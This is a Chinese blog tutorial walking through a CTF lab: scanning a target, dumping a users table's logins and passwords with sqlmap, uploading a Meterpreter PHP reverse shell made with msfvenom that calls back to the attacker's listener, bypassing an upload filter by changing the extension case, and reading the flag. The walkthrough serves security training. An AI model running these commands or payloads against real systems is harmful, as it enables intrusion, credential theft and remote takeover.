6-1CTF夺旗入门教程--SQL注入GET参数

最新推荐文章于 2023-02-13 17:02:30 发布
最新推荐文章于 2023-02-13 17:02:30 发布
阅读量722 收藏 2
点赞数
分类专栏: CTF学习 文章标签: mysql 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46622606/article/details/105280002
版权
1.SQL注入漏洞介绍

SQL注入产生的原因主要为以下几方面:

  • 不当的类型处理
  • 不安全的数据库配置
  • 不合理的查询集处理
  • 不当的错误处理
  • 不当的转义字符处理
  • 不当的多个提交处理
2.信息探测
#扫描服务器信息及服务版本
nmap -sV 192.168.2.116
#快速扫描靶场全部信息
nmap -T4 -A -v 192.168.2.116
#探测敏感信息
nikto -host http://192.168.2.116
dirb http://192.168.2.116
3.深入挖掘
#对nikto和dirb的扫描结果进行分析,查找可以利用的信息
4.漏洞扫描
#web漏洞扫描owasp-zap

在这里插入图片描述

5.漏洞利用
#对扫描结果进行分析,如果具有SQL,可以直接利用,毕竟SQL注入是高危漏洞,可以直接获取服务期权限。
#使用sqlmap利用SQL注入漏洞
#查看数据库名
sqlmap -u url --dbs
sqlmap -u url -D  "数据库名" --tables 查看对应数据库中的表
sqlmap -u url -D  "数据库名" -T "表名" --columns 查看对应字段
sqlmap -u url -D "数据库名" -T "表名" - C "列名" --dump 查看对应字段的值
#也可以尝试直接获取shell
sqlmap -u url -os -shell 

#information_schema 系统自带数据库

在这里插入图片描述

#查看数据库中的字段,值
sqlmap -u "http://192.168.2.116/cat.php?id=3" -D "photoblog" -T "users" -C "login,password" --dump

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

6.上传shell反弹权限
#攻击机启动监听
msf>use exploit/multi/handler
>set payload php/meterpreter/reverse_tcp
>set lhost 192.168.2.110
>set lport 4444
>run
#生成反弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.2.110 lport=4444 -f raw 
 --->>>>   /root/Desktop/shell.php
 #上传shell并执行
 #绕过过滤机制,把.php改为.PHP
7.获取flag
#一般情况下,靶场机器flag值存在服务器根目录/root/目录下
cd /root/
ls
cat flag
#完成测试、总计文档
#如果无法在该权限下查看flag,则需要提升root权限
8.总结

靶场机器如果存在SQL注入漏洞,可以利用sqlmap进行获取数据

获得靶场机器shell之后,可以分析是否需要提权

SQL注入往往要和上传漏洞配合,上传shell

The Riddler.
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
stripe-ctf-2.0:
05-19
条纹:网络版 此存储库包含从Stripe CTF 2.0到2012年8月22日至29日运行的级别的源代码。
CTFHub闯关之SQL注入
m0_60716947的博客
05-01 3359
CTF(Capture The Flag)中文一般译作赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。 CTFHub 地址:CTFHub CTF.
使用sqlmap + burpsuite sql工具注入拿flag
太阳照耀我走四方
02-13 1581
简单的渗透工具sqlmap使用
6-2CTF入门教程--SQL注入POST参数-注入HTTP报文
高冷的宅先生
04-06 687
1.信息探测 #扫描主机开放的全部端口 nmap -T4 -p- 192.168.2.117 #扫描靶场全部信息 nmap -T4 -A -v 192.168.2.117 #探测敏感信息 nikto -host http:// dirb http:// #漏洞扫描 owasp 2.漏洞利用 登录界面 #burpsuite抓包,需要把浏览器设置代理 #在登录界面尝试登录,抓取请求数据包,保存为r...
CTF入门笔记之SQL注入
qq_37410729的博客
11-01 2901
sql注入
CTF实战(faka注入
Marsper的博客
09-18 1224
CTF实战 SQL注入(faka) 方法一:蚁键注入 首先获取实战链接 访问链接打开,并按上篇文章所学寻找相关post提交处,设法找到注入点,如图,得知付款处即为post提交处 打开burp实行抓包,检测注入点是否正确 将注入点链接抛入sqlmap中寻找准确注入点,找出数据库,爆出后台管理员密码 输入sqlmap.py -u “117.167.136.244:28088/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --dum
CTF-sql注入(get)【简单易懂】
墨鱼菜鸡
09-10 322
目录 环境配置 信息探测 探测敏感信息 尝试弱口令登录 漏洞扫描 web漏洞扫描器owasp-zap 扫描结果 漏洞利用 存在sql注入漏洞 获取数据库 获取数据库下的表名 获取字段值 获取用户名和密码 登录系统 上传shell反弹权限 生成webshell 制作webshell 使用exploit 上传she...
Web安全漏洞原理——SQL注入
changyu233的博客
04-17 3316
Web安全漏洞原理——SQL注入 SQL注入 原理 ​ 由于程序员对插入SQL语句的用户输入参数检查不严格,导致的恶意SQL命令被插入语句并执行。 ​ 例如: ​ 原始查询语句为 select * from user where id=$value ​ $value为用户输入变量,由于没有过滤,在用户输入 1 and 1=2时 ​ 查询语句变为 select * from user where id=1 and 1=2,返回永假页面。 SQL数据库重要信息 MySQL数据库 默认数据库: ​ i
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
超微X11SPW-CTF主板用户手册
最新发布
04-01
超微X11SPW-CTF主板用户手册
saigar-ctf:Saigar CTF 平台
05-29
Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,000 多条。 有关更多详细信息,请参阅介绍性。特征基于角色的访问控制(管理员、裁判、参赛者) Eventbrite 集成Auth0 集成参赛者自行报名禁止...
ctf-scoreboard:记分牌系统
04-28
CTF记分牌申请 这是一个可重用的应用程序,用于承载“捕获标志记分牌”应用程序。 可以在举办CTF竞赛时使用它,以便参加CTF的人们可以提交标志,阅读范围规则和查看标志任务。 管理员帐户将能够添加,删除和管理用户...
攻防世界web练习题
qamcwc的博客
11-05 203
第一题 view_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 点击F12,在查看器中找到flag,即cyberpeace{df58eefd1baef249cd377aa3fbbca005} 第二题 robots 题目描述:X老师上课讲了Robots协议,小宁同学却上课打了瞌睡,赶紧来教教小宁Robots协议是什么吧。 查看该网站的robots.txt文件 可以看到,禁止访问 f1ag_1s_h3re.php,那么我们直接查f1ag_
CTF-SQL注入Get
su__xiaoyan的博客
12-22 764
SQL注入 当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 实验环境 攻击者:Kali Linux(192.168.100.146) 靶机:VMware workstations Pro——Debian 6(32-bit)(192.168.100.132) 注意:当前靶机中并没有flag值,需要通过靶机上面的SQL注入漏洞获取数据库中的内容,登陆网站后台,利用网站
【愚公系列】2023年05月 Web渗透测试之SQL注入(sqli-labs、Less-1)
热门推荐
时光隧道
07-14 5万+
SQL注入是一种常见的攻击方式,它利用应用程序未对用户输入的数据进行正确的过滤和验证,以达到访问或篡改系统数据的目的。具体来说,攻击者可以在注入点上构造恶意的SQL语句,并成功提交给数据库执行,从而造成数据泄露、篡改或者破坏。SQL注入攻击的应用场景非常广泛,常见于Web应用、数据库应用或其他需要使用SQL语句进行数据操作的应用中。order by -- + 判断字段数目union select -- + 联合查询收集信息。
网络安全、赛(CTF)技能汇总
hanjingjava的专栏
10-22 6000
本文综合博主参赛准备经历,总结介绍了过程中了解的网络安全、赛(CTF)相关知识及资源,分为资料篇、工具篇、解题思路篇。
CTF-sql注入(get)
qq_43776408的博客
03-10 788
1. 结果 2. -T4最快速度扫描 -A 加载所有模块 -v 以一种尽可能详细的方式显示 3. 上张图片的黄色的部分,就是目标的网站的登录页面 你可以在历览器中访问这个页面 4. 这个软件是kali自带的 5. 5. ...
SQL注入实战第一个flag!
qq_41904330的博客
08-04 6066
SQL注入实战: 登陆的是墨者平台的这个SQL实战 登陆进去后我们进行用burp进行抓包: 进行抓包获取后发送到重新器中: 看到当order by为5的时候报错了说明字段数少于5那么试一下order by 4# 发现order by 4# 没有报错说明字段数为4 我们检测一下输入的点用 select 1,2,3,4#来检测一下都在什么位置 我们来查看数据库名称:查出来为mozhe_di...
渗透测试前的信息收集(玄魂磐石计划课件搬运)
高冷的宅先生
05-29 941
1.常规信息收集之域名 备案号查询 备案号是网站是否合法注册经营的标志,可随时到国家工业和信息化部网站备案系统上查询该ICP备案的相关详细信息。 网站:www.beianbeian.com 子域名发现的原理 利用现有搜索引擎: 网页搜索引擎(如:谷歌等) 空间搜索引擎(如:Shodan等) SSL证书(如:crt.sh等) 爆破又分为两种: 直接访问子域名 利用 DNS 请求 其他泄露信息: 如 crossdomain.xml 文件等 爬虫递归爬取等 DNS域传送漏洞等 2.常规信息收集——子域名 暴
Apple-Mail CTF
07-27
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [[CTFHub] Web 文件上传 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值